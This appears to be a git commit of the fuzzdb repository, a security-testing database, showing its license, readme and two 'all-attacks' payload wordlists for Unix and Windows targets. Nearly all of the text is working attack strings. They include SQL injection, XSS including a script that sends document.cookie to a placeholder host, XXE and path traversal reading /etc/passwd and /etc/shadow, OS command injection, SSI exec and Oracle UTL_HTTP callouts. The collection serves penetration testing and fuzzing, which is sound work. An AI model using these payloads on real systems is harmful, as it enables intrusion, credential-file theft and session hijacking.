mirror of
https://github.com/fuzzdb-project/fuzzdb.git
synced 2024-11-10 05:24:12 +00:00
push all
This commit is contained in:
commit
6bd1a2434a
138 changed files with 269525 additions and 0 deletions
33
_copyright.txt
Normal file
33
_copyright.txt
Normal file
|
@ -0,0 +1,33 @@
|
|||
Copyright (c) 2010, Adam Muntner
|
||||
All rights reserved.
|
||||
|
||||
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
|
||||
|
||||
Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
|
||||
Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
|
||||
Neither the name of fuzzdb nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
|
||||
|
||||
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
||||
|
||||
Licensed under Creative Commons - By Attribution
|
||||
|
||||
see
|
||||
|
||||
http://creativecommons.org/licenses/by/3.0/legalcode
|
||||
|
||||
----
|
||||
|
||||
contains dictionaries from Skipfish
|
||||
Copyright 2010 Michal Zalewski
|
||||
|
||||
Licensed under the Apache License, Version 2.0 (the "License");
|
||||
you may not use this file except in compliance with the License.
|
||||
You may obtain a copy of the License at
|
||||
|
||||
http://www.apache.org/licenses/LICENSE-2.0
|
||||
|
||||
Unless required by applicable law or agreed to in writing, software
|
||||
distributed under the License is distributed on an "AS IS" BASIS,
|
||||
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
See the License for the specific language governing permissions and
|
||||
limitations under the License.
|
49
_readme.txt
Normal file
49
_readme.txt
Normal file
|
@ -0,0 +1,49 @@
|
|||
fuzzdb: Web Fuzzing Discovery and Attack Pattern Database
|
||||
adam muntner [unix23 (at) gmail . com]
|
||||
|
||||
Introduction
|
||||
|
||||
Too much new software is vulnerable to the attack sequences of yesteryear. This suggests a testing approach: a comprehensive set of known attack pattern sequences can be leveraged for use in targeted fuzzing when testing for exploitable conditions in new applications.
|
||||
|
||||
This is especially useful for many filter bypass type exploits. Identical encoding sequences have been observed to bypass filters for more than one application. Examples can be observed in categories including xss, sqli, evil script upload, OS command execution, traversal issues, directory indexing bugs, source code revealing vulnerabilities, etc. In recent times, for example, new embedded webservers were discovered to be vulnerable to directory traversal issues triggered by encodings that exploited Microsoft IIS in 2000.
|
||||
|
||||
This approach is also useful for targeted use of brute force for discovery using, for example, lists of known vulnerable scripts sorted by platform type, default locations of critical files of popular apps, high quality lists of common directory names.
|
||||
|
||||
Primary sources used for attack pattern research:
|
||||
|
||||
-researching old web exploits for repeatable attack strings
|
||||
-scraping scanner patterns from my own http logs
|
||||
-various books, articles, blog posts
|
||||
-documentation for popular applications
|
||||
-metasploit wmap http://www.metasploit.com/redmine/projects/framework/wiki/WMAP
|
||||
-dirb http://www.open-labs.org/
|
||||
-jbrofuzz http://www.owasp.org/index.php/Category:OWASP_JBroFuzz
|
||||
-skipfish http://code.google.com/p/skipfish/
|
||||
-rsnake's xss and rfi files http://ha.ckers.org/
|
||||
-michael daw's web shell archive http://michaeldaw.org/
|
||||
-joseph giron (joseph.giron13 (at) gmail.com)
|
||||
-analysis of default app installs
|
||||
-lists already submitted to OWASP Fuzzing Code DB by Wagner Elias, Eduardo Neves, Ulisses Castro, Adam Muntner http://www.owasp.org/index.php/Category:OWASP_Fuzzing_Code_Database#tab=News
|
||||
-Some files are derived primarily from other fuzzers, and are credited in the files with comments formatted like:
|
||||
|
||||
# This file is primarily derived from source xyz
|
||||
|
||||
Others have additional instructions for payload use in a similar comment format at the top of the file
|
||||
|
||||
Download
|
||||
|
||||
Check out via svn:
|
||||
|
||||
svn checkout http://fuzzdb.googlecode.com/svn/trunk/ fuzzdb-read-only
|
||||
|
||||
Or, pick from a plethora of available svn clients: http://en.wikipedia.org/wiki/Comparison_of_Subversion_clients
|
||||
|
||||
Tarballs are available for download, but may not be as fresh as what's in the svn repo.
|
||||
|
||||
Browse the repo http://code.google.com/p/fuzzdb/source/browse/#svn/trunk
|
||||
|
||||
Who
|
||||
|
||||
This SVN repository and the files were assembled by Adam Muntner (unix23 @ gmail.com) He is the Managing Partner of QuietMove, Inc. http://www.quietmove.com - a firm that specializes in web application penetration testing and developer training.
|
||||
|
||||
|
512
attack-payloads/all-attacks/all-attacks-unix.txt
Normal file
512
attack-payloads/all-attacks/all-attacks-unix.txt
Normal file
|
@ -0,0 +1,512 @@
|
|||
# a wide sample of malicious input for unix-like targets
|
||||
!
|
||||
!'
|
||||
!@#$%%^#$%#$@#$%$$@#$%^^**(()
|
||||
!@#0%^#0##018387@#0^^**(()
|
||||
"
|
||||
" or "a"="a
|
||||
" or "x"="x
|
||||
" or 0=0 #
|
||||
" or 0=0 --
|
||||
" or 1=1 or ""="
|
||||
" or 1=1--
|
||||
"' or 1 --'"
|
||||
") or ("a"="a
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////dev/random"">]><foo>&xxe;</foo>"
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/passwd"">]><foo>&xxe;</foo>"
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[' or 1=1 or ''=']]></foo>"
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>"
|
||||
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
|
||||
"<xml ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
|
||||
"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
|
||||
"><script>"
|
||||
"><script>alert(1)</script>
|
||||
"><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?'+document.cookie</script>
|
||||
">xxx<P>yyy
|
||||
"\t"
|
||||
#
|
||||
#'
|
||||
#'
|
||||
#xA
|
||||
#xA#xD
|
||||
#xD
|
||||
#xD#xA
|
||||
$NULL
|
||||
$null
|
||||
%
|
||||
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
|
||||
%00
|
||||
%00../../../../../../etc/passwd
|
||||
%00../../../../../../etc/shadow
|
||||
%00/
|
||||
%00/etc/passwd%00
|
||||
%01%02%03%04%0a%0d%0aADSF
|
||||
%08x
|
||||
%0A/usr/bin/id
|
||||
%0A/usr/bin/id%0A
|
||||
%0Aid
|
||||
%0Aid%0A
|
||||
%0a ping -i 30 127.0.0.1 %0a
|
||||
%oa ping -n 30 127.0.0.1 %0a
|
||||
%0a id %0a
|
||||
%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+<youremail>%0aRCPT+TO:+<youremail>%0aDATA%0aFrom:+<youremail>%0aTo:+<youremail>%0aSubject:+tst%0afoo%0a%2e%0a
|
||||
%0d
|
||||
%0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+<youremail>%0d%0aRCPT+TO:+<youremail>%0d%0aDATA%0d%0aFrom:+<youremail>%0d%0aTo:+<youremail>%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a
|
||||
%0d%0aX-Injection-Header:%20AttackValue
|
||||
%20
|
||||
%20$(sleep%2050)
|
||||
%20'sleep%2050'
|
||||
%20d
|
||||
%20n
|
||||
%20s
|
||||
%20x
|
||||
%20|
|
||||
%21
|
||||
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
|
||||
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini
|
||||
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00
|
||||
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
|
||||
%2500
|
||||
%250a
|
||||
%26
|
||||
%27%20or%201=1
|
||||
%28
|
||||
%29
|
||||
%2A
|
||||
%2A%28%7C%28mail%3D%2A%29%29
|
||||
%2A%28%7C%28objectclass%3D%2A%29%29
|
||||
%2A%7C
|
||||
%2C
|
||||
%2e%2e%2f
|
||||
%3C
|
||||
%3C%3F
|
||||
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
|
||||
%3cscript%3ealert("XSS");%3c/script%3e
|
||||
%3cscript%3ealert(document.cookie);%3c%2fscript%3e
|
||||
%5C
|
||||
%5C/
|
||||
%60
|
||||
%7C
|
||||
%7f
|
||||
%99999999999s
|
||||
%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A
|
||||
%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E
|
||||
%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F
|
||||
%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G
|
||||
%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X
|
||||
%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a
|
||||
%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d
|
||||
%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e
|
||||
%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f
|
||||
%ff
|
||||
%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g
|
||||
%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i
|
||||
%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o
|
||||
%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
|
||||
%s%p%x%d
|
||||
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
|
||||
%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u
|
||||
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
|
||||
&
|
||||
& id
|
||||
& ping -i 30 127.0.0.1 &
|
||||
& ping -n 30 127.0.0.1 &
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
|
||||
|
||||
|
||||
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
'
|
||||
'%20OR
|
||||
&id
|
||||
<
|
||||
<
|
||||
<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->
|
||||
<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->
|
||||
<!--#exec%20cmd="/usr/bin/id;-->
|
||||
<>"'%;)(&+
|
||||
<script>alert(document.cookie);<script>alert
|
||||
<script>alert(document.cookie);</script>
|
||||
";id"
|
||||
'
|
||||
' (select top 1
|
||||
' --
|
||||
' ;
|
||||
' UNION ALL SELECT
|
||||
' UNION SELECT
|
||||
' or ''='
|
||||
' or '1'='1
|
||||
' or '1'='1'--
|
||||
' or 'x'='x
|
||||
' or (EXISTS)
|
||||
' or 0=0 #
|
||||
' or 0=0 --
|
||||
' or 1 in (@@version)--
|
||||
' or 1=1 or ''='
|
||||
' or 1=1--
|
||||
' or a=a--
|
||||
' or uid like '%
|
||||
' or uname like '%
|
||||
' or user like '%
|
||||
' or userid like '%
|
||||
' or username like '%
|
||||
'%20or%201=1
|
||||
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
|
||||
'';!--"<XSS>=&{()}
|
||||
') or ('a'='a
|
||||
'--
|
||||
'; exec master..xp_cmdshell
|
||||
'; exec xp_regread
|
||||
'; waitfor delay '0:30:0'--
|
||||
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
|
||||
';shutdown--
|
||||
'><script>alert(document.cookie);</script>
|
||||
'><script>alert(document.cookie)</script>
|
||||
'hi' or 'x'='x';
|
||||
'or select *
|
||||
'sqlattempt1
|
||||
'||UTL_HTTP.REQUEST
|
||||
'||Utl_Http.request('http://<yourservername>') from dual--
|
||||
(
|
||||
(')
|
||||
(sqlattempt2)
|
||||
)
|
||||
))))))))))
|
||||
*
|
||||
*'
|
||||
*'
|
||||
*(|(mail=*))
|
||||
*(|(objectclass=*))
|
||||
*/*
|
||||
*|
|
||||
+
|
||||
+%00
|
||||
,@variable
|
||||
-
|
||||
--
|
||||
--';
|
||||
--sp_password
|
||||
-1
|
||||
-1.0
|
||||
-2
|
||||
-20
|
||||
-268435455
|
||||
..%%35%63
|
||||
..%%35c
|
||||
..%25%35%63
|
||||
..%255c
|
||||
..%5c
|
||||
..%bg%qf
|
||||
..%c0%af
|
||||
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
|
||||
..%u2215
|
||||
..%u2216
|
||||
../
|
||||
../../../../../../../../../../../../etc/hosts
|
||||
../../../../../../../../../../../../etc/hosts%00
|
||||
../../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../../../etc/shadow
|
||||
../../../../../../../../../../../../etc/shadow%00
|
||||
..\
|
||||
..\..\..\..\..\..\..\..\..\..\etc\passwd
|
||||
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
|
||||
..\..\..\..\..\..\..\..\..\..\etc\shadow
|
||||
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
|
||||
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
|
||||
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
|
||||
/
|
||||
/%00/
|
||||
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
|
||||
/%2A
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
|
||||
/'
|
||||
/'
|
||||
/,%ENV,/
|
||||
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
|
||||
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
|
||||
/.../.../.../.../.../
|
||||
/../../../../../../../../%2A
|
||||
/../../../../../../../../../../../etc/passwd%00.html
|
||||
/../../../../../../../../../../../etc/passwd%00.jpg
|
||||
/../../../../../../../../../../etc/passwd
|
||||
/../../../../../../../../../../etc/passwd^^
|
||||
/../../../../../../../../../../etc/shadow
|
||||
/../../../../../../../../../../etc/shadow^^
|
||||
/../../../../../../../../bin/id|
|
||||
/..\../..\../..\../..\../..\../..\../boot.ini
|
||||
/..\../..\../..\../..\../..\../..\../etc/passwd
|
||||
/..\../..\../..\../..\../..\../..\../etc/shadow
|
||||
/./././././././././././etc/passwd
|
||||
/./././././././././././etc/shadow
|
||||
//
|
||||
//*
|
||||
/etc/passwd
|
||||
/etc/shadow
|
||||
/index.html|id|
|
||||
0
|
||||
0 or 1=1
|
||||
00
|
||||
0xfffffff
|
||||
1
|
||||
1 or 1 in (@@version)--
|
||||
1 or 1=1--
|
||||
1.0
|
||||
1; waitfor delay '0:30:0'--
|
||||
1;SELECT%20*
|
||||
1||Utl_Http.request('http://<yourservername>') from dual--
|
||||
2
|
||||
2147483647
|
||||
268435455
|
||||
65536
|
||||
:response.write 111111
|
||||
;
|
||||
; ping 127.0.0.1 ;
|
||||
;/usr/bin/id\n
|
||||
;echo 111111
|
||||
;id
|
||||
;id;
|
||||
;id\n
|
||||
;id|
|
||||
;ls -la
|
||||
;system('/usr/bin/id')
|
||||
;system('cat%20/etc/passwd')
|
||||
;system('id')
|
||||
;|/usr/bin/id|
|
||||
<
|
||||
< script > < / script>
|
||||
<!
|
||||
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
|
||||
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
|
||||
</foo>
|
||||
<<
|
||||
<<<
|
||||
<<script>alert("XSS");//<</script>
|
||||
<>"'%;)(&+
|
||||
<?
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo>
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo>
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/shadow">]><foo>&xxe;</foo>
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xxe;</foo>
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo>
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
|
||||
<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
|
||||
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
||||
<IMG DYNSRC="javascript:alert('XSS')">
|
||||
<IMG LOWSRC="javascript:alert('XSS')">
|
||||
<IMG SRC="  javascript:alert('XSS');">
|
||||
<IMG SRC="jav ascript:alert('XSS');">
|
||||
<IMG SRC="jav	ascript:alert('XSS');">
|
||||
<IMG SRC="jav
ascript:alert('XSS');">
|
||||
<IMG SRC="jav
ascript:alert('XSS');">
|
||||
<IMG SRC="javascript:alert('XSS')"
|
||||
<IMG SRC="javascript:alert('XSS');">
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
||||
<IMG SRC=`javascript:alert("'XSS'")`>
|
||||
<IMG SRC=javascript:alert("XSS")>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
||||
<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>
|
||||
<IMG%20SRC='javasc ript:alert(document.cookie)'>
|
||||
<IMG%20SRC='javascript:alert(document.cookie)'>
|
||||
<foo></foo>
|
||||
<name>','')); phpinfo(); exit;/*</name>
|
||||
<script>alert("XSS")</script>
|
||||
<script>alert(document.cookie)</script>
|
||||
<xml ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
||||
<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
|
||||
<xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
||||
<xss><script>alert('XSS')</script></vulnerable>
|
||||
<youremail>%0aBcc:<youremail>
|
||||
<youremail>%0aCc:<youremail>
|
||||
<youremail>%0d%0aBcc:<youremail>
|
||||
<youremail>%0d%0aCc:<youremail>
|
||||
=
|
||||
='
|
||||
=--
|
||||
=;
|
||||
>
|
||||
?x=
|
||||
?x="
|
||||
?x=>
|
||||
?x=|
|
||||
@'
|
||||
@'
|
||||
@*
|
||||
@variable
|
||||
A
|
||||
ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|
|
||||
FALSE
|
||||
NULL
|
||||
PRINT
|
||||
PRINT @@variable
|
||||
TRUE
|
||||
XXXXX.%p
|
||||
XXXXX`perl -e 'print ".%p" x 80'`
|
||||
[']
|
||||
[']
|
||||
\
|
||||
\";alert('XSS');//
|
||||
\"blah
|
||||
\'
|
||||
\'
|
||||
\..\..\..\..\..\..\..\..\..\..\etc\passwd
|
||||
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
|
||||
\..\..\..\..\..\..\..\..\..\..\etc\shadow
|
||||
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
|
||||
\0
|
||||
\00
|
||||
\00\00
|
||||
\00\00\00
|
||||
\0\0
|
||||
\0\0\0
|
||||
\\
|
||||
\\'/bin/cat%20/etc/passwd\\'
|
||||
\\'/bin/cat%20/etc/shadow\\'
|
||||
\\/
|
||||
\\\\*
|
||||
\\\\?\\
|
||||
\n/bin/ls -al\n
|
||||
\n/usr/bin/id;
|
||||
\n/usr/bin/id\n
|
||||
\n/usr/bin/id|
|
||||
\nid;
|
||||
\nid\n
|
||||
\nid|
|
||||
\nnetstat -a%\n
|
||||
\t
|
||||
\u003C
|
||||
\u003c
|
||||
\x23
|
||||
\x27
|
||||
\x27UNION SELECT
|
||||
\x27\x4F\x52 SELECT *
|
||||
\x27\x6F\x72 SELECT *
|
||||
\x3C
|
||||
\x3D \x27
|
||||
\x3D \x3B'
|
||||
\x3c
|
||||
^'
|
||||
^'
|
||||
`
|
||||
`/usr/bin/id`
|
||||
`dir`
|
||||
`id`
|
||||
`perl -e 'print ".%p" x 80'`%n
|
||||
`ping 127.0.0.1`
|
||||
a);/usr/bin/id
|
||||
a);/usr/bin/id;
|
||||
a);/usr/bin/id|
|
||||
a);id
|
||||
a);id;
|
||||
a);id|
|
||||
a)|/usr/bin/id
|
||||
a)|/usr/bin/id;
|
||||
a)|id
|
||||
a)|id;
|
||||
a;/usr/bin/id
|
||||
a;/usr/bin/id;
|
||||
a;/usr/bin/id|
|
||||
a;id
|
||||
a;id;
|
||||
a;id|
|
||||
http://<yourservername>/
|
||||
id%00
|
||||
id%00|
|
||||
insert
|
||||
like
|
||||
limit
|
||||
null
|
||||
or
|
||||
or 0=0 #
|
||||
or 0=0 --
|
||||
or 1=1--
|
||||
or%201=1
|
||||
or%201=1 --
|
||||
response.write 111111
|
||||
something%00html
|
||||
update
|
||||
x' or 1=1 or 'x'='y
|
||||
x' or name()='username' or 'x'='y
|
||||
xsstest
|
||||
xsstest%00"<>'
|
||||
{'}
|
||||
|/usr/bin/id
|
||||
|/usr/bin/id|
|
||||
|id
|
||||
|id;
|
||||
|id|
|
||||
|ls
|
||||
|ls -la
|
||||
|nid\n
|
||||
|usr/bin/id\n
|
||||
||
|
||||
|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &
|
||||
||/usr/bin/id;
|
||||
||/usr/bin/id|
|
||||
}
|
531
attack-payloads/all-attacks/all-attacks-win.txt
Normal file
531
attack-payloads/all-attacks/all-attacks-win.txt
Normal file
|
@ -0,0 +1,531 @@
|
|||
# a wide sample of malicious input for windows targets
|
||||
A
|
||||
TRUE
|
||||
FALSE
|
||||
0
|
||||
00
|
||||
1
|
||||
-1
|
||||
1.0
|
||||
-1.0
|
||||
2
|
||||
-2
|
||||
-20
|
||||
65536
|
||||
268435455
|
||||
-268435455
|
||||
2147483647
|
||||
0xfffffff
|
||||
NULL
|
||||
null
|
||||
\0
|
||||
\00
|
||||
< script > < / script>
|
||||
%0a
|
||||
%00
|
||||
+%00
|
||||
\0
|
||||
\0\0
|
||||
\0\0\0
|
||||
\00
|
||||
\00\00
|
||||
\00\00\00
|
||||
$null
|
||||
$NULL
|
||||
`dir`
|
||||
\nnetstat -a%\n
|
||||
\"blah
|
||||
|dir|
|
||||
";id"
|
||||
dir%00
|
||||
dir%00|
|
||||
|dir
|
||||
|dir|
|
||||
|/bin/ls -al
|
||||
?x=
|
||||
?x="
|
||||
?x=|
|
||||
?x=>
|
||||
/boot.ini
|
||||
ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|
|
||||
../../boot.ini
|
||||
/../../../../../../../../%2A
|
||||
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00
|
||||
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini
|
||||
